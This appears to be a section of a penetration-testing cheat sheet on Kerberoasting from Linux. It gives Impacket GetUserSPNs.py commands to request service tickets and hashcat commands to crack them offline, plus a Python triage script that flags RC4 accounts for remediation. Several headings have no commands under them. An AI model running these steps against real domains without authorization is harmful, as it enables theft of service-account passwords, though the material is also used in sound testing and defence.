14. Kerberoasting - from Linux

Installation (if needed):

sudo python3 -m pip install .  # Installs Impacket from a cloned Impacket source directory (run inside that directory)
sudo pip3 install impacket    # Alternative, installs the packaged release from PyPI

Help:

GetUserSPNs.py -h  # Displays help options

List SPNs (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>  # Replace <DC_IP>, <DOMAIN>, and <USER> with actual values. Prompts for password.

Request TGS Tickets (all):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request

Request TGS Ticket (specific user):

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER>

Request and Save TGS Ticket:

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER> -outputfile <OUTPUT_FILE>  # Replace <OUTPUT_FILE> with the desired filename.

Hashcat (Linux):

Crack TGS Ticket:

hashcat -m 13100 <TGS_FILE> <WORDLIST>  # Replace <TGS_FILE> with the ticket file and <WORDLIST> with the wordlist path.
hashcat -m 13100 <TGS_FILE> <WORDLIST> --force  # Adds --force, which makes hashcat ignore its own warnings (e.g. about the driver/OpenCL setup) and run anyway.
hashcat -m 13100 <TGS_FILE> <WORDLIST> -o <CRACKED_FILE>  # Adds the -o option to output the cracked password to a file.

CrackMapExec (Linux):

Test Authentication:


Verification of Extracted Hashes:

Before cracking, verify the extracted TGS hashes:

This helps confirm that the ticket is properly extracted.
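Added example (not part of Impacket or of this cheat sheet): a small Python triage script for the file written by `-outputfile`. It checks that each line has the expected `$krb5tgs$` layout, reports the encryption type and matching hashcat mode per account, and lists the accounts whose tickets were still issued with RC4 (etype 23), which are the ones an AES-only or gMSA migration should fix first. The sample lines, account names and hex fields are constructed placeholders.

```python
"""Triage a GetUserSPNs.py -outputfile: validate the $krb5tgs$ lines and flag
accounts still receiving RC4 (etype 23) service tickets. Added example, not
Impacket code; sample data below is constructed."""
from dataclasses import dataclass
from typing import Optional

# etype -> (cipher name, hashcat mode). 23 is the weak, fast-to-crack one.
ETYPES = {23: ("RC4-HMAC", 13100), 17: ("AES128-CTS", 19600), 18: ("AES256-CTS", 19700)}


@dataclass
class TgsEntry:
    etype: int
    user: str
    realm: str
    spn: str


def parse_line(line: str) -> Optional[TgsEntry]:
    """Parse one $krb5tgs$ line; returns None for lines that are not tickets.
    Impacket writes etype 23 as  $krb5tgs$23$*user$REALM$spn*$cksum$edata
    and etype 17/18 as           $krb5tgs$18$user$REALM$*spn*$cksum$edata,
    so the '*' markers sit in different fields; stripping them handles both."""
    parts = line.strip().split("$")
    if len(parts) != 8 or parts[1] != "krb5tgs" or not parts[2].isdigit():
        return None
    return TgsEntry(int(parts[2]), parts[3].strip("*"), parts[4], parts[5].strip("*"))


def triage(lines):
    """Return (report rows, accounts still on RC4). Each row is
    (user, spn, cipher name, hashcat mode); unknown etypes get mode None."""
    report, rc4_accounts = [], []
    for entry in filter(None, map(parse_line, lines)):
        name, mode = ETYPES.get(entry.etype, ("unknown", None))
        report.append((entry.user, entry.spn, name, mode))
        if entry.etype == 23:
            rc4_accounts.append(entry.user)
    return report, rc4_accounts


# Constructed sample lines: checksum/edata fields are truncated placeholders.
SAMPLE = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local~1433*$0123456789abcdef0123456789abcdef$a1b2c3",
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$0123456789abcdef0123456789abcdef$d4e5f6",
    "not a ticket line",
]

if __name__ == "__main__":
    rows, weak = triage(SAMPLE)
    for user, spn, cipher, mode in rows:
        print(f"{user:12} {spn:40} {cipher:12} hashcat -m {mode}")
    print("Accounts to move to AES-only / gMSA:", weak)
```

Run it against the real `<OUTPUT_FILE>` by replacing `SAMPLE` with `open(path).readlines()`; any line that parses as None was not written correctly and will not load in hashcat either.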


Interactive Shell Variants:

If running GetUserSPNs.py over SSH or in a restricted shell, use:

Or execute the script in a non-interactive mode:

This ensures the process runs even after logging out.


Alternative Tools for SPN Enumeration:

  1. kerbrute - Fast SPN brute-forcing and enumeration.

  2. BloodHound - Visualizing AD attack paths.
